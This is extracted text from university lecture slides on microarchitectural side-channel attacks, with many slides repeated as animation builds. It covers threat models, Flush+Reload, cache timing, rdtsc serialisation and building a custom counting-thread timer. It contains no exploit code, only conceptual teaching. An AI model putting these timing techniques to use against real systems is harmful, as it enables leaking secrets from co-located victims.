![Page 71: (Why) Are Microarchitectural Attacks Really Different than ... · attacks and their mitigations [36, 43] are outside the scope of this work. [...] 5 Daniel Gruss | Graz University](https://reader035.fdocuments.in/reader035/viewer/2022071210/6021cec46996713aba46c366/html5/thumbnails/71.jpg)
Microarchitectural Attacks - Threat Model www.tugraz.at
• Usually no physical access
• Local code
• Co-located code
• Different meanings of “remote”
1. Attacker controls code in browser sandbox (e.g., [Ore+15;
GMM16])
2. Attacker cannot control any code on the system
13 Daniel Gruss — Graz University of Technology
![Page 72: (Why) Are Microarchitectural Attacks Really Different than ... · attacks and their mitigations [36, 43] are outside the scope of this work. [...] 5 Daniel Gruss | Graz University](https://reader035.fdocuments.in/reader035/viewer/2022071210/6021cec46996713aba46c366/html5/thumbnails/72.jpg)
Microarchitectural Attacks - Threat Model www.tugraz.at
• Usually no physical access
• Local code
• Co-located code
• Different meanings of “remote”
1. Attacker controls code in browser sandbox (e.g., [Ore+15;
GMM16])
2. Attacker cannot control any code on the system
13 Daniel Gruss — Graz University of Technology
![Page 73: (Why) Are Microarchitectural Attacks Really Different than ... · attacks and their mitigations [36, 43] are outside the scope of this work. [...] 5 Daniel Gruss | Graz University](https://reader035.fdocuments.in/reader035/viewer/2022071210/6021cec46996713aba46c366/html5/thumbnails/73.jpg)
Microarchitectural Attacks - Threat Model www.tugraz.at
• Usually no physical access
• Local code
• Co-located code
• Different meanings of “remote”
1. Attacker controls code in browser sandbox (e.g., [Ore+15;
GMM16])
2. Attacker cannot control any code on the system
13 Daniel Gruss — Graz University of Technology
![Page 74: (Why) Are Microarchitectural Attacks Really Different than ... · attacks and their mitigations [36, 43] are outside the scope of this work. [...] 5 Daniel Gruss | Graz University](https://reader035.fdocuments.in/reader035/viewer/2022071210/6021cec46996713aba46c366/html5/thumbnails/74.jpg)
Truly remote attacks... www.tugraz.at
Just a few examples:
• Remote timing attacks on crypto ([Ber04; BB05] and many
more)
• ThrowHammer [Tat+18] and NetHammer [Lip+17]
• NetSpectre [Sch+18b]
14 Daniel Gruss — Graz University of Technology
![Page 75: (Why) Are Microarchitectural Attacks Really Different than ... · attacks and their mitigations [36, 43] are outside the scope of this work. [...] 5 Daniel Gruss | Graz University](https://reader035.fdocuments.in/reader035/viewer/2022071210/6021cec46996713aba46c366/html5/thumbnails/75.jpg)
Truly remote attacks... www.tugraz.at
Just a few examples:
• Remote timing attacks on crypto ([Ber04; BB05] and many
more)
• ThrowHammer [Tat+18] and NetHammer [Lip+17]
• NetSpectre [Sch+18b]
14 Daniel Gruss — Graz University of Technology
![Page 76: (Why) Are Microarchitectural Attacks Really Different than ... · attacks and their mitigations [36, 43] are outside the scope of this work. [...] 5 Daniel Gruss | Graz University](https://reader035.fdocuments.in/reader035/viewer/2022071210/6021cec46996713aba46c366/html5/thumbnails/76.jpg)
Truly remote attacks... www.tugraz.at
Just a few examples:
• Remote timing attacks on crypto ([Ber04; BB05] and many
more)
• ThrowHammer [Tat+18] and NetHammer [Lip+17]
• NetSpectre [Sch+18b]
14 Daniel Gruss — Graz University of Technology
![Page 77: (Why) Are Microarchitectural Attacks Really Different than ... · attacks and their mitigations [36, 43] are outside the scope of this work. [...] 5 Daniel Gruss | Graz University](https://reader035.fdocuments.in/reader035/viewer/2022071210/6021cec46996713aba46c366/html5/thumbnails/77.jpg)
Truly remote attacks... www.tugraz.at
Just a few examples:
• Remote timing attacks on crypto ([Ber04; BB05] and many
more)
• ThrowHammer [Tat+18] and NetHammer [Lip+17]
• NetSpectre [Sch+18b]
14 Daniel Gruss — Graz University of Technology
![Page 78: (Why) Are Microarchitectural Attacks Really Different than ... · attacks and their mitigations [36, 43] are outside the scope of this work. [...] 5 Daniel Gruss | Graz University](https://reader035.fdocuments.in/reader035/viewer/2022071210/6021cec46996713aba46c366/html5/thumbnails/78.jpg)
![Page 79: (Why) Are Microarchitectural Attacks Really Different than ... · attacks and their mitigations [36, 43] are outside the scope of this work. [...] 5 Daniel Gruss | Graz University](https://reader035.fdocuments.in/reader035/viewer/2022071210/6021cec46996713aba46c366/html5/thumbnails/79.jpg)
CPU Cache www.tugraz.at
15 Daniel Gruss — Graz University of Technology
![Page 80: (Why) Are Microarchitectural Attacks Really Different than ... · attacks and their mitigations [36, 43] are outside the scope of this work. [...] 5 Daniel Gruss | Graz University](https://reader035.fdocuments.in/reader035/viewer/2022071210/6021cec46996713aba46c366/html5/thumbnails/80.jpg)
CPU Cache www.tugraz.at
15 Daniel Gruss — Graz University of Technology
![Page 81: (Why) Are Microarchitectural Attacks Really Different than ... · attacks and their mitigations [36, 43] are outside the scope of this work. [...] 5 Daniel Gruss | Graz University](https://reader035.fdocuments.in/reader035/viewer/2022071210/6021cec46996713aba46c366/html5/thumbnails/81.jpg)
CPU Cache www.tugraz.at
15 Daniel Gruss — Graz University of Technology
![Page 82: (Why) Are Microarchitectural Attacks Really Different than ... · attacks and their mitigations [36, 43] are outside the scope of this work. [...] 5 Daniel Gruss | Graz University](https://reader035.fdocuments.in/reader035/viewer/2022071210/6021cec46996713aba46c366/html5/thumbnails/82.jpg)
CPU Cache www.tugraz.at
15 Daniel Gruss — Graz University of Technology
![Page 83: (Why) Are Microarchitectural Attacks Really Different than ... · attacks and their mitigations [36, 43] are outside the scope of this work. [...] 5 Daniel Gruss | Graz University](https://reader035.fdocuments.in/reader035/viewer/2022071210/6021cec46996713aba46c366/html5/thumbnails/83.jpg)
CPU Cache www.tugraz.at
15 Daniel Gruss — Graz University of Technology
![Page 84: (Why) Are Microarchitectural Attacks Really Different than ... · attacks and their mitigations [36, 43] are outside the scope of this work. [...] 5 Daniel Gruss | Graz University](https://reader035.fdocuments.in/reader035/viewer/2022071210/6021cec46996713aba46c366/html5/thumbnails/84.jpg)
CPU Cache www.tugraz.at
15 Daniel Gruss — Graz University of Technology
![Page 85: (Why) Are Microarchitectural Attacks Really Different than ... · attacks and their mitigations [36, 43] are outside the scope of this work. [...] 5 Daniel Gruss | Graz University](https://reader035.fdocuments.in/reader035/viewer/2022071210/6021cec46996713aba46c366/html5/thumbnails/85.jpg)
CPU Cache www.tugraz.at
15 Daniel Gruss — Graz University of Technology
![Page 86: (Why) Are Microarchitectural Attacks Really Different than ... · attacks and their mitigations [36, 43] are outside the scope of this work. [...] 5 Daniel Gruss | Graz University](https://reader035.fdocuments.in/reader035/viewer/2022071210/6021cec46996713aba46c366/html5/thumbnails/86.jpg)
CPU Cache www.tugraz.at
15 Daniel Gruss — Graz University of Technology
![Page 87: (Why) Are Microarchitectural Attacks Really Different than ... · attacks and their mitigations [36, 43] are outside the scope of this work. [...] 5 Daniel Gruss | Graz University](https://reader035.fdocuments.in/reader035/viewer/2022071210/6021cec46996713aba46c366/html5/thumbnails/87.jpg)
Flush+Reload www.tugraz.at
16 Daniel Gruss — Graz University of Technology
![Page 88: (Why) Are Microarchitectural Attacks Really Different than ... · attacks and their mitigations [36, 43] are outside the scope of this work. [...] 5 Daniel Gruss | Graz University](https://reader035.fdocuments.in/reader035/viewer/2022071210/6021cec46996713aba46c366/html5/thumbnails/88.jpg)
Flush+Reload www.tugraz.at
16 Daniel Gruss — Graz University of Technology
![Page 89: (Why) Are Microarchitectural Attacks Really Different than ... · attacks and their mitigations [36, 43] are outside the scope of this work. [...] 5 Daniel Gruss | Graz University](https://reader035.fdocuments.in/reader035/viewer/2022071210/6021cec46996713aba46c366/html5/thumbnails/89.jpg)
Flush+Reload www.tugraz.at
16 Daniel Gruss — Graz University of Technology
![Page 90: (Why) Are Microarchitectural Attacks Really Different than ... · attacks and their mitigations [36, 43] are outside the scope of this work. [...] 5 Daniel Gruss | Graz University](https://reader035.fdocuments.in/reader035/viewer/2022071210/6021cec46996713aba46c366/html5/thumbnails/90.jpg)
Flush+Reload www.tugraz.at
16 Daniel Gruss — Graz University of Technology
![Page 91: (Why) Are Microarchitectural Attacks Really Different than ... · attacks and their mitigations [36, 43] are outside the scope of this work. [...] 5 Daniel Gruss | Graz University](https://reader035.fdocuments.in/reader035/viewer/2022071210/6021cec46996713aba46c366/html5/thumbnails/91.jpg)
Flush+Reload www.tugraz.at
16 Daniel Gruss — Graz University of Technology
![Page 92: (Why) Are Microarchitectural Attacks Really Different than ... · attacks and their mitigations [36, 43] are outside the scope of this work. [...] 5 Daniel Gruss | Graz University](https://reader035.fdocuments.in/reader035/viewer/2022071210/6021cec46996713aba46c366/html5/thumbnails/92.jpg)
Flush+Reload www.tugraz.at
16 Daniel Gruss — Graz University of Technology
![Page 93: (Why) Are Microarchitectural Attacks Really Different than ... · attacks and their mitigations [36, 43] are outside the scope of this work. [...] 5 Daniel Gruss | Graz University](https://reader035.fdocuments.in/reader035/viewer/2022071210/6021cec46996713aba46c366/html5/thumbnails/93.jpg)
Flush+Reload www.tugraz.at
16 Daniel Gruss — Graz University of Technology
![Page 94: (Why) Are Microarchitectural Attacks Really Different than ... · attacks and their mitigations [36, 43] are outside the scope of this work. [...] 5 Daniel Gruss | Graz University](https://reader035.fdocuments.in/reader035/viewer/2022071210/6021cec46996713aba46c366/html5/thumbnails/94.jpg)
Flush+Reload www.tugraz.at
16 Daniel Gruss — Graz University of Technology
![Page 95: (Why) Are Microarchitectural Attacks Really Different than ... · attacks and their mitigations [36, 43] are outside the scope of this work. [...] 5 Daniel Gruss | Graz University](https://reader035.fdocuments.in/reader035/viewer/2022071210/6021cec46996713aba46c366/html5/thumbnails/95.jpg)
Temporal Component: Timestamps www.tugraz.at
Physical Side Channels
• theoretical maximum accuracy of 5.4 · 10−44s
• feasible today: 850 · 10−21s
Microarchitectural Attacks
• often around nanoseconds
• sometimes much lower
17 Daniel Gruss — Graz University of Technology
![Page 96: (Why) Are Microarchitectural Attacks Really Different than ... · attacks and their mitigations [36, 43] are outside the scope of this work. [...] 5 Daniel Gruss | Graz University](https://reader035.fdocuments.in/reader035/viewer/2022071210/6021cec46996713aba46c366/html5/thumbnails/96.jpg)
Temporal Component: Timestamps www.tugraz.at
Physical Side Channels
• theoretical maximum accuracy of 5.4 · 10−44s
• feasible today: 850 · 10−21s
Microarchitectural Attacks
• often around nanoseconds
• sometimes much lower
17 Daniel Gruss — Graz University of Technology
![Page 97: (Why) Are Microarchitectural Attacks Really Different than ... · attacks and their mitigations [36, 43] are outside the scope of this work. [...] 5 Daniel Gruss | Graz University](https://reader035.fdocuments.in/reader035/viewer/2022071210/6021cec46996713aba46c366/html5/thumbnails/97.jpg)
Temporal Component: Timestamps www.tugraz.at
Physical Side Channels
• theoretical maximum accuracy of 5.4 · 10−44s
• feasible today: 850 · 10−21s
Microarchitectural Attacks
• often around nanoseconds
• sometimes much lower
17 Daniel Gruss — Graz University of Technology
![Page 98: (Why) Are Microarchitectural Attacks Really Different than ... · attacks and their mitigations [36, 43] are outside the scope of this work. [...] 5 Daniel Gruss | Graz University](https://reader035.fdocuments.in/reader035/viewer/2022071210/6021cec46996713aba46c366/html5/thumbnails/98.jpg)
Temporal Component: Timestamps www.tugraz.at
Physical Side Channels
• theoretical maximum accuracy of 5.4 · 10−44s
• feasible today: 850 · 10−21s
Microarchitectural Attacks
• often around nanoseconds
• sometimes much lower
17 Daniel Gruss — Graz University of Technology
![Page 99: (Why) Are Microarchitectural Attacks Really Different than ... · attacks and their mitigations [36, 43] are outside the scope of this work. [...] 5 Daniel Gruss | Graz University](https://reader035.fdocuments.in/reader035/viewer/2022071210/6021cec46996713aba46c366/html5/thumbnails/99.jpg)
Temporal Component: Timestamps www.tugraz.at
Physical Side Channels
• theoretical maximum accuracy of 5.4 · 10−44s
• feasible today: 850 · 10−21s
Microarchitectural Attacks
• often around nanoseconds
• sometimes much lower
17 Daniel Gruss — Graz University of Technology
![Page 100: (Why) Are Microarchitectural Attacks Really Different than ... · attacks and their mitigations [36, 43] are outside the scope of this work. [...] 5 Daniel Gruss | Graz University](https://reader035.fdocuments.in/reader035/viewer/2022071210/6021cec46996713aba46c366/html5/thumbnails/100.jpg)
Temporal Component: Timestamps www.tugraz.at
Physical Side Channels
• theoretical maximum accuracy of 5.4 · 10−44s
• feasible today: 850 · 10−21s
Microarchitectural Attacks
• often around nanoseconds
• sometimes much lower
17 Daniel Gruss — Graz University of Technology
![Page 101: (Why) Are Microarchitectural Attacks Really Different than ... · attacks and their mitigations [36, 43] are outside the scope of this work. [...] 5 Daniel Gruss | Graz University](https://reader035.fdocuments.in/reader035/viewer/2022071210/6021cec46996713aba46c366/html5/thumbnails/101.jpg)
Temporal Component: Sampling Rate www.tugraz.at
Physical Side Channels
• in the range of multiple GHz
Microarchitectural Attacks
• usually varying frequency (depending on the attack)
• between a few ns (< 1 GHz) and multiple seconds (< 1 Hz) (or
even worse)
• strongly dependent on the specific attack
• device under test = measurement device
• observer effect
18 Daniel Gruss — Graz University of Technology
![Page 102: (Why) Are Microarchitectural Attacks Really Different than ... · attacks and their mitigations [36, 43] are outside the scope of this work. [...] 5 Daniel Gruss | Graz University](https://reader035.fdocuments.in/reader035/viewer/2022071210/6021cec46996713aba46c366/html5/thumbnails/102.jpg)
Temporal Component: Sampling Rate www.tugraz.at
Physical Side Channels
• in the range of multiple GHz
Microarchitectural Attacks
• usually varying frequency (depending on the attack)
• between a few ns (< 1 GHz) and multiple seconds (< 1 Hz) (or
even worse)
• strongly dependent on the specific attack
• device under test = measurement device
• observer effect
18 Daniel Gruss — Graz University of Technology
![Page 103: (Why) Are Microarchitectural Attacks Really Different than ... · attacks and their mitigations [36, 43] are outside the scope of this work. [...] 5 Daniel Gruss | Graz University](https://reader035.fdocuments.in/reader035/viewer/2022071210/6021cec46996713aba46c366/html5/thumbnails/103.jpg)
Temporal Component: Sampling Rate www.tugraz.at
Physical Side Channels
• in the range of multiple GHz
Microarchitectural Attacks
• usually varying frequency (depending on the attack)
• between a few ns (< 1 GHz) and multiple seconds (< 1 Hz) (or
even worse)
• strongly dependent on the specific attack
• device under test = measurement device
• observer effect
18 Daniel Gruss — Graz University of Technology
![Page 104: (Why) Are Microarchitectural Attacks Really Different than ... · attacks and their mitigations [36, 43] are outside the scope of this work. [...] 5 Daniel Gruss | Graz University](https://reader035.fdocuments.in/reader035/viewer/2022071210/6021cec46996713aba46c366/html5/thumbnails/104.jpg)
Temporal Component: Sampling Rate www.tugraz.at
Physical Side Channels
• in the range of multiple GHz
Microarchitectural Attacks
• usually varying frequency (depending on the attack)
• between a few ns (< 1 GHz) and multiple seconds (< 1 Hz) (or
even worse)
• strongly dependent on the specific attack
• device under test = measurement device
• observer effect
18 Daniel Gruss — Graz University of Technology
![Page 105: (Why) Are Microarchitectural Attacks Really Different than ... · attacks and their mitigations [36, 43] are outside the scope of this work. [...] 5 Daniel Gruss | Graz University](https://reader035.fdocuments.in/reader035/viewer/2022071210/6021cec46996713aba46c366/html5/thumbnails/105.jpg)
Temporal Component: Sampling Rate www.tugraz.at
Physical Side Channels
• in the range of multiple GHz
Microarchitectural Attacks
• usually varying frequency (depending on the attack)
• between a few ns (< 1 GHz) and multiple seconds (< 1 Hz) (or
even worse)
• strongly dependent on the specific attack
• device under test = measurement device
• observer effect
18 Daniel Gruss — Graz University of Technology
![Page 106: (Why) Are Microarchitectural Attacks Really Different than ... · attacks and their mitigations [36, 43] are outside the scope of this work. [...] 5 Daniel Gruss | Graz University](https://reader035.fdocuments.in/reader035/viewer/2022071210/6021cec46996713aba46c366/html5/thumbnails/106.jpg)
Temporal Component: Sampling Rate www.tugraz.at
Physical Side Channels
• in the range of multiple GHz
Microarchitectural Attacks
• usually varying frequency (depending on the attack)
• between a few ns (< 1 GHz) and multiple seconds (< 1 Hz) (or
even worse)
• strongly dependent on the specific attack
• device under test = measurement device
• observer effect
18 Daniel Gruss — Graz University of Technology
![Page 107: (Why) Are Microarchitectural Attacks Really Different than ... · attacks and their mitigations [36, 43] are outside the scope of this work. [...] 5 Daniel Gruss | Graz University](https://reader035.fdocuments.in/reader035/viewer/2022071210/6021cec46996713aba46c366/html5/thumbnails/107.jpg)
Temporal Component: Sampling Rate www.tugraz.at
Physical Side Channels
• in the range of multiple GHz
Microarchitectural Attacks
• usually varying frequency (depending on the attack)
• between a few ns (< 1 GHz) and multiple seconds (< 1 Hz) (or
even worse)
• strongly dependent on the specific attack
• device under test = measurement device
• observer effect
18 Daniel Gruss — Graz University of Technology
![Page 108: (Why) Are Microarchitectural Attacks Really Different than ... · attacks and their mitigations [36, 43] are outside the scope of this work. [...] 5 Daniel Gruss | Graz University](https://reader035.fdocuments.in/reader035/viewer/2022071210/6021cec46996713aba46c366/html5/thumbnails/108.jpg)
Temporal Component: Sampling Rate www.tugraz.at
Physical Side Channels
• in the range of multiple GHz
Microarchitectural Attacks
• usually varying frequency (depending on the attack)
• between a few ns (< 1 GHz) and multiple seconds (< 1 Hz) (or
even worse)
• strongly dependent on the specific attack
• device under test = measurement device
• observer effect
18 Daniel Gruss — Graz University of Technology
![Page 109: (Why) Are Microarchitectural Attacks Really Different than ... · attacks and their mitigations [36, 43] are outside the scope of this work. [...] 5 Daniel Gruss | Graz University](https://reader035.fdocuments.in/reader035/viewer/2022071210/6021cec46996713aba46c366/html5/thumbnails/109.jpg)
Microarchitectural Observer Effect www.tugraz.at
device under test = measurement device
• measuring time takes some time
• limits the resolution
• measuring cache hits/misses manipulates the cache state
• virtually all measurements are destructive
19 Daniel Gruss — Graz University of Technology
![Page 110: (Why) Are Microarchitectural Attacks Really Different than ... · attacks and their mitigations [36, 43] are outside the scope of this work. [...] 5 Daniel Gruss | Graz University](https://reader035.fdocuments.in/reader035/viewer/2022071210/6021cec46996713aba46c366/html5/thumbnails/110.jpg)
Measurement Noise www.tugraz.at
Flush+Reload has no noise except for:
• Race condition between attacker and victim (observer effect)
• Speculative execution
• Prefetching
• ...
→ Typically > 99.99% precision and recall
20 Daniel Gruss — Graz University of Technology
![Page 111: (Why) Are Microarchitectural Attacks Really Different than ... · attacks and their mitigations [36, 43] are outside the scope of this work. [...] 5 Daniel Gruss | Graz University](https://reader035.fdocuments.in/reader035/viewer/2022071210/6021cec46996713aba46c366/html5/thumbnails/111.jpg)
Measurement Noise www.tugraz.at
Flush+Reload has no noise except for:
• Race condition between attacker and victim (observer effect)
• Speculative execution
• Prefetching
• ...
→ Typically > 99.99% precision and recall
20 Daniel Gruss — Graz University of Technology
![Page 112: (Why) Are Microarchitectural Attacks Really Different than ... · attacks and their mitigations [36, 43] are outside the scope of this work. [...] 5 Daniel Gruss | Graz University](https://reader035.fdocuments.in/reader035/viewer/2022071210/6021cec46996713aba46c366/html5/thumbnails/112.jpg)
Measurement Noise www.tugraz.at
Flush+Reload has no noise except for:
• Race condition between attacker and victim (observer effect)
• Speculative execution
• Prefetching
• ...
→ Typically > 99.99% precision and recall
20 Daniel Gruss — Graz University of Technology
![Page 113: (Why) Are Microarchitectural Attacks Really Different than ... · attacks and their mitigations [36, 43] are outside the scope of this work. [...] 5 Daniel Gruss | Graz University](https://reader035.fdocuments.in/reader035/viewer/2022071210/6021cec46996713aba46c366/html5/thumbnails/113.jpg)
Measurement Noise www.tugraz.at
Flush+Reload has no noise except for:
• Race condition between attacker and victim (observer effect)
• Speculative execution
• Prefetching
• ...
→ Typically > 99.99% precision and recall
20 Daniel Gruss — Graz University of Technology
![Page 114: (Why) Are Microarchitectural Attacks Really Different than ... · attacks and their mitigations [36, 43] are outside the scope of this work. [...] 5 Daniel Gruss | Graz University](https://reader035.fdocuments.in/reader035/viewer/2022071210/6021cec46996713aba46c366/html5/thumbnails/114.jpg)
Measurement Noise www.tugraz.at
Flush+Reload has no noise except for:
• Race condition between attacker and victim (observer effect)
• Speculative execution
• Prefetching
• ...
→ Typically > 99.99% precision and recall
20 Daniel Gruss — Graz University of Technology
![Page 115: (Why) Are Microarchitectural Attacks Really Different than ... · attacks and their mitigations [36, 43] are outside the scope of this work. [...] 5 Daniel Gruss | Graz University](https://reader035.fdocuments.in/reader035/viewer/2022071210/6021cec46996713aba46c366/html5/thumbnails/115.jpg)
Measurement Noise www.tugraz.at
Flush+Reload has no noise except for:
• Race condition between attacker and victim (observer effect)
• Speculative execution
• Prefetching
• ...
→ Typically > 99.99% precision and recall
20 Daniel Gruss — Graz University of Technology
![Page 116: (Why) Are Microarchitectural Attacks Really Different than ... · attacks and their mitigations [36, 43] are outside the scope of this work. [...] 5 Daniel Gruss | Graz University](https://reader035.fdocuments.in/reader035/viewer/2022071210/6021cec46996713aba46c366/html5/thumbnails/116.jpg)
Measurement Noise www.tugraz.at
Flush+Reload has no noise except for:
• Race condition between attacker and victim (observer effect)
• Speculative execution
• Prefetching
• ...
→ Typically > 99.99% precision and recall
20 Daniel Gruss — Graz University of Technology
![Page 117: (Why) Are Microarchitectural Attacks Really Different than ... · attacks and their mitigations [36, 43] are outside the scope of this work. [...] 5 Daniel Gruss | Graz University](https://reader035.fdocuments.in/reader035/viewer/2022071210/6021cec46996713aba46c366/html5/thumbnails/117.jpg)
Measurement Noise www.tugraz.at
Flush+Reload has no noise except for:
• Race condition between attacker and victim (observer effect)
• Speculative execution
• Prefetching
• ...
→ Typically > 99.99% precision and recall
20 Daniel Gruss — Graz University of Technology
![Page 118: (Why) Are Microarchitectural Attacks Really Different than ... · attacks and their mitigations [36, 43] are outside the scope of this work. [...] 5 Daniel Gruss | Graz University](https://reader035.fdocuments.in/reader035/viewer/2022071210/6021cec46996713aba46c366/html5/thumbnails/118.jpg)
Measuring Processor Operations
![Page 119: (Why) Are Microarchitectural Attacks Really Different than ... · attacks and their mitigations [36, 43] are outside the scope of this work. [...] 5 Daniel Gruss | Graz University](https://reader035.fdocuments.in/reader035/viewer/2022071210/6021cec46996713aba46c366/html5/thumbnails/119.jpg)
Timing Measurements www.tugraz.at
• Very short timings
• rdtsc instruction: “cycle-accurate” timestamps
[...]
rdtsc
function()
rdtsc
[...]
21 Daniel Gruss — Graz University of Technology
![Page 120: (Why) Are Microarchitectural Attacks Really Different than ... · attacks and their mitigations [36, 43] are outside the scope of this work. [...] 5 Daniel Gruss | Graz University](https://reader035.fdocuments.in/reader035/viewer/2022071210/6021cec46996713aba46c366/html5/thumbnails/120.jpg)
What are we measuring? www.tugraz.at
• Do you measure what you think you measure?
• Out-of-order execution → what is really executed
rdtsc
function()
[...]
rdtsc
rdtsc
[...]
rdtsc
function()
rdtsc
rdtsc
function()
[...]
22 Daniel Gruss — Graz University of Technology
![Page 121: (Why) Are Microarchitectural Attacks Really Different than ... · attacks and their mitigations [36, 43] are outside the scope of this work. [...] 5 Daniel Gruss | Graz University](https://reader035.fdocuments.in/reader035/viewer/2022071210/6021cec46996713aba46c366/html5/thumbnails/121.jpg)
![Page 122: (Why) Are Microarchitectural Attacks Really Different than ... · attacks and their mitigations [36, 43] are outside the scope of this work. [...] 5 Daniel Gruss | Graz University](https://reader035.fdocuments.in/reader035/viewer/2022071210/6021cec46996713aba46c366/html5/thumbnails/122.jpg)
Accurate Microarchitecture Timing www.tugraz.at
• use pseudo-serializing instruction rdtscp (recent CPUs)
• and/or use serializing instructions like cpuid
• and/or use fences like mfence
Intel, How to Benchmark Code Execution Times on Intel IA-32 and IA-64 Instruction Set Architectures
White Paper, December 2010.
23 Daniel Gruss — Graz University of Technology
![Page 123: (Why) Are Microarchitectural Attacks Really Different than ... · attacks and their mitigations [36, 43] are outside the scope of this work. [...] 5 Daniel Gruss | Graz University](https://reader035.fdocuments.in/reader035/viewer/2022071210/6021cec46996713aba46c366/html5/thumbnails/123.jpg)
Accurate Microarchitecture Timing www.tugraz.at
• use pseudo-serializing instruction rdtscp (recent CPUs)
• and/or use serializing instructions like cpuid
• and/or use fences like mfence
Intel, How to Benchmark Code Execution Times on Intel IA-32 and IA-64 Instruction Set Architectures
White Paper, December 2010.
23 Daniel Gruss — Graz University of Technology
![Page 124: (Why) Are Microarchitectural Attacks Really Different than ... · attacks and their mitigations [36, 43] are outside the scope of this work. [...] 5 Daniel Gruss | Graz University](https://reader035.fdocuments.in/reader035/viewer/2022071210/6021cec46996713aba46c366/html5/thumbnails/124.jpg)
Accurate Microarchitecture Timing www.tugraz.at
• use pseudo-serializing instruction rdtscp (recent CPUs)
• and/or use serializing instructions like cpuid
• and/or use fences like mfence
Intel, How to Benchmark Code Execution Times on Intel IA-32 and IA-64 Instruction Set Architectures
White Paper, December 2010.
23 Daniel Gruss — Graz University of Technology
![Page 125: (Why) Are Microarchitectural Attacks Really Different than ... · attacks and their mitigations [36, 43] are outside the scope of this work. [...] 5 Daniel Gruss | Graz University](https://reader035.fdocuments.in/reader035/viewer/2022071210/6021cec46996713aba46c366/html5/thumbnails/125.jpg)
Accurate Microarchitecture Timing www.tugraz.at
• use pseudo-serializing instruction rdtscp (recent CPUs)
• and/or use serializing instructions like cpuid
• and/or use fences like mfence
Intel, How to Benchmark Code Execution Times on Intel IA-32 and IA-64 Instruction Set Architectures
White Paper, December 2010.
23 Daniel Gruss — Graz University of Technology
![Page 126: (Why) Are Microarchitectural Attacks Really Different than ... · attacks and their mitigations [36, 43] are outside the scope of this work. [...] 5 Daniel Gruss | Graz University](https://reader035.fdocuments.in/reader035/viewer/2022071210/6021cec46996713aba46c366/html5/thumbnails/126.jpg)
![Page 127: (Why) Are Microarchitectural Attacks Really Different than ... · attacks and their mitigations [36, 43] are outside the scope of this work. [...] 5 Daniel Gruss | Graz University](https://reader035.fdocuments.in/reader035/viewer/2022071210/6021cec46996713aba46c366/html5/thumbnails/127.jpg)
Memory Access Latency www.tugraz.at
50 100 150 200 250 300 350 400
101
104
107
Access time [CPU cycles]
Nu
mb
erof
acce
sses
Cache Hits
24 Daniel Gruss — Graz University of Technology
![Page 128: (Why) Are Microarchitectural Attacks Really Different than ... · attacks and their mitigations [36, 43] are outside the scope of this work. [...] 5 Daniel Gruss | Graz University](https://reader035.fdocuments.in/reader035/viewer/2022071210/6021cec46996713aba46c366/html5/thumbnails/128.jpg)
Memory Access Latency www.tugraz.at
50 100 150 200 250 300 350 400
101
104
107
Access time [CPU cycles]
Nu
mb
erof
acce
sses
Cache Hits Cache Misses
24 Daniel Gruss — Graz University of Technology
![Page 129: (Why) Are Microarchitectural Attacks Really Different than ... · attacks and their mitigations [36, 43] are outside the scope of this work. [...] 5 Daniel Gruss | Graz University](https://reader035.fdocuments.in/reader035/viewer/2022071210/6021cec46996713aba46c366/html5/thumbnails/129.jpg)
Temporal Component www.tugraz.at
• Flush+Reload had beautifully nice timings, right?
• Well... steps of 2-4 cycles
• only 35-70 steps between hits and misses
• On some devices only 1-2 steps!
25 Daniel Gruss — Graz University of Technology
![Page 130: (Why) Are Microarchitectural Attacks Really Different than ... · attacks and their mitigations [36, 43] are outside the scope of this work. [...] 5 Daniel Gruss | Graz University](https://reader035.fdocuments.in/reader035/viewer/2022071210/6021cec46996713aba46c366/html5/thumbnails/130.jpg)
Temporal Component www.tugraz.at
• Flush+Reload had beautifully nice timings, right?
• Well... steps of 2-4 cycles
• only 35-70 steps between hits and misses
• On some devices only 1-2 steps!
25 Daniel Gruss — Graz University of Technology
![Page 131: (Why) Are Microarchitectural Attacks Really Different than ... · attacks and their mitigations [36, 43] are outside the scope of this work. [...] 5 Daniel Gruss | Graz University](https://reader035.fdocuments.in/reader035/viewer/2022071210/6021cec46996713aba46c366/html5/thumbnails/131.jpg)
Temporal Component www.tugraz.at
• Flush+Reload had beautifully nice timings, right?
• Well... steps of 2-4 cycles
• only 35-70 steps between hits and misses
• On some devices only 1-2 steps!
25 Daniel Gruss — Graz University of Technology
![Page 132: (Why) Are Microarchitectural Attacks Really Different than ... · attacks and their mitigations [36, 43] are outside the scope of this work. [...] 5 Daniel Gruss | Graz University](https://reader035.fdocuments.in/reader035/viewer/2022071210/6021cec46996713aba46c366/html5/thumbnails/132.jpg)
Temporal Component www.tugraz.at
• Flush+Reload had beautifully nice timings, right?
• Well... steps of 2-4 cycles
• only 35-70 steps between hits and misses
• On some devices only 1-2 steps!
25 Daniel Gruss — Graz University of Technology
![Page 133: (Why) Are Microarchitectural Attacks Really Different than ... · attacks and their mitigations [36, 43] are outside the scope of this work. [...] 5 Daniel Gruss | Graz University](https://reader035.fdocuments.in/reader035/viewer/2022071210/6021cec46996713aba46c366/html5/thumbnails/133.jpg)
Temporal Component www.tugraz.at
• Flush+Reload had beautifully nice timings, right?
• Well... steps of 2-4 cycles
• only 35-70 steps between hits and misses
• On some devices only 1-2 steps!
25 Daniel Gruss — Graz University of Technology
![Page 134: (Why) Are Microarchitectural Attacks Really Different than ... · attacks and their mitigations [36, 43] are outside the scope of this work. [...] 5 Daniel Gruss | Graz University](https://reader035.fdocuments.in/reader035/viewer/2022071210/6021cec46996713aba46c366/html5/thumbnails/134.jpg)
Temporal Component www.tugraz.at
• Flush+Reload had beautifully nice timings, right?
• Well... steps of 2-4 cycles
• only 35-70 steps between hits and misses
• On some devices only 1-2 steps!
25 Daniel Gruss — Graz University of Technology
![Page 135: (Why) Are Microarchitectural Attacks Really Different than ... · attacks and their mitigations [36, 43] are outside the scope of this work. [...] 5 Daniel Gruss | Graz University](https://reader035.fdocuments.in/reader035/viewer/2022071210/6021cec46996713aba46c366/html5/thumbnails/135.jpg)
Temporal Component www.tugraz.at
• Flush+Reload had beautifully nice timings, right?
• Well... steps of 2-4 cycles
• only 35-70 steps between hits and misses
• On some devices only 1-2 steps!
25 Daniel Gruss — Graz University of Technology
![Page 136: (Why) Are Microarchitectural Attacks Really Different than ... · attacks and their mitigations [36, 43] are outside the scope of this work. [...] 5 Daniel Gruss | Graz University](https://reader035.fdocuments.in/reader035/viewer/2022071210/6021cec46996713aba46c366/html5/thumbnails/136.jpg)
Timer www.tugraz.at
• We can build our own timer [Lip+16; Sch+17]
• Start a thread that continuously increments a global variable
• The global variable is our timestamp
26 Daniel Gruss — Graz University of Technology
